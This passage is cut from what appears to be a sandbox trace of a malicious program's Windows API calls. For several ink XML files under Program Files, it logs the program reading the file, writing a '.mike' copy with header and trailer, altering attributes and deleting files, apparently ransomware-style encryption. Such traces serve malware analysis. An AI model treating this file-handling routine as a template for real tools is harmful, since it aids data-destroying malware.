nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.mike", lpFilePart=0x0) returned 0x42 [0043.536] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipschs.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipschs.xml.mike")) returned 1 [0043.537] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", lpFilePart=0x0) returned 0x3d [0043.537] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", lpFilePart=0x0) returned 0x3d [0043.537] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", lpFilePart=0x0) returned 0x3d [0043.537] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0043.537] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0043.539] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0043.539] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", lpFilePart=0x0) returned 0x3d [0043.539] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0043.539] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.540] GetFileType (hFile=0x264) returned 0x1 [0043.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0043.540] GetFileType (hFile=0x264) returned 0x1 [0043.540] CloseHandle (hObject=0x264) returned 1 [0043.540] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", lpFilePart=0x0) returned 0x3d [0043.540] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", lpFilePart=0x0) returned 0x3d [0043.540] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0043.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0043.540] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0043.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0043.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.540] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml"), fInfoLevelId=0x0, lpFileInformation=0x2122984 | out: lpFileInformation=0x2122984*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c23c14, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c23c14, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x984)) returned 1 [0043.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.540] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", lpFilePart=0x0) returned 0x3d [0043.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.541] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml"), fInfoLevelId=0x0, lpFileInformation=0x2122c74 | out: lpFileInformation=0x2122c74*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c23c14, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c23c14, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x984)) returned 1 [0043.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.541] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", lpFilePart=0x0) returned 0x3d [0043.541] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.mike", lpFilePart=0x0) returned 0x42 [0043.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.541] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.541] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", lpFilePart=0x0) returned 0x3d [0043.541] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", lpFilePart=0x0) returned 0x3d [0043.541] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", lpFilePart=0x0) returned 0x3d [0043.541] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.mike", lpFilePart=0x0) returned 0x42 [0043.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0043.541] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0043.541] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.mike", lpFilePart=0x0) returned 0x42 [0043.542] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.542] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.542] GetFileType (hFile=0x264) returned 0x1 [0043.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.542] GetFileType (hFile=0x264) returned 0x1 [0043.542] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0043.542] WriteFile (in: hFile=0x264, lpBuffer=0x21239c8*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21239c8*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0043.543] CloseHandle (hObject=0x264) returned 1 [0043.543] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0043.543] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml"), fInfoLevelId=0x0, lpFileInformation=0x212350c | out: lpFileInformation=0x212350c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c23c14, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c23c14, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x984)) returned 1 [0043.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0043.544] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", lpFilePart=0x0) returned 0x3d [0043.544] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.544] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.544] GetFileType (hFile=0x264) returned 0x1 [0043.544] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.544] GetFileType (hFile=0x264) returned 0x1 [0043.544] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0043.544] ReadFile (in: hFile=0x264, lpBuffer=0x2124adc, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2124adc*, lpNumberOfBytesRead=0x2af0c8*=0x984, lpOverlapped=0x0) returned 1 [0043.590] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.mike", lpFilePart=0x0) returned 0x42 [0043.590] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.590] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.590] GetFileType (hFile=0x264) returned 0x1 [0043.591] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.591] GetFileType (hFile=0x264) returned 0x1 [0043.591] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0043.591] WriteFile (in: hFile=0x264, lpBuffer=0x212b2b4*, nNumberOfBytesToWrite=0x990, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x212b2b4*, lpNumberOfBytesWritten=0x2af0bc*=0x990, lpOverlapped=0x0) returned 1 [0043.591] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.mike", lpFilePart=0x0) returned 0x42 [0043.591] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0043.591] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.591] GetFileType (hFile=0x264) returned 0x1 [0043.591] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0043.591] GetFileType (hFile=0x264) returned 0x1 [0043.592] WriteFile (in: hFile=0x264, lpBuffer=0x212e4c8*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x212e4c8*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0043.593] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", lpFilePart=0x0) returned 0x3d [0043.593] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.mike", lpFilePart=0x0) returned 0x42 [0043.593] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.593] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe426dc40, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe426dc40, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe43061c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xbb0)) returned 1 [0043.593] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.593] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", lpFilePart=0x0) returned 0x3d [0043.593] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.mike", lpFilePart=0x0) returned 0x42 [0043.593] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.593] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x212fb78 | out: lpFileInformation=0x212fb78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe426dc40, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe426dc40, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe43061c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xbb0)) returned 1 [0043.593] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.593] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", lpFilePart=0x0) returned 0x3d [0043.593] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", dwFileAttributes=0x80) returned 0 [0043.595] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml", lpFilePart=0x0) returned 0x3d [0043.595] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0043.595] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe426dc40, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe426dc40, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe43061c0, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xbb0)) returned 1 [0043.595] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0043.595] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscht.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscht.xml.mike")) returned 1 [0043.597] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0043.597] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0043.598] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0043.598] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0043.598] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.599] GetFileType (hFile=0x264) returned 0x1 [0043.599] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0043.599] GetFileType (hFile=0x264) returned 0x1 [0043.599] CloseHandle (hObject=0x264) returned 1 [0043.599] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0043.599] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0043.599] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0043.599] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.599] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml"), fInfoLevelId=0x0, lpFileInformation=0x2131ad8 | out: lpFileInformation=0x2131ad8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c23c14, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c23c14, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9fc)) returned 1 [0043.599] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.599] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.599] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml"), fInfoLevelId=0x0, lpFileInformation=0x2131dc8 | out: lpFileInformation=0x2131dc8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c23c14, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c23c14, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9fc)) returned 1 [0043.600] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.600] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.600] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.600] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.600] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml", lpFilePart=0x0) returned 0x3d [0043.600] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.mike", lpFilePart=0x0) returned 0x42 [0043.600] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0043.600] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.600] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0043.600] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.mike", lpFilePart=0x0) returned 0x42 [0043.600] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.600] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.601] GetFileType (hFile=0x264) returned 0x1 [0043.601] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.601] GetFileType (hFile=0x264) returned 0x1 [0043.601] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0043.601] WriteFile (in: hFile=0x264, lpBuffer=0x2132b1c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x2132b1c*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0043.602] CloseHandle (hObject=0x264) returned 1 [0043.602] SetThreadErrorMode 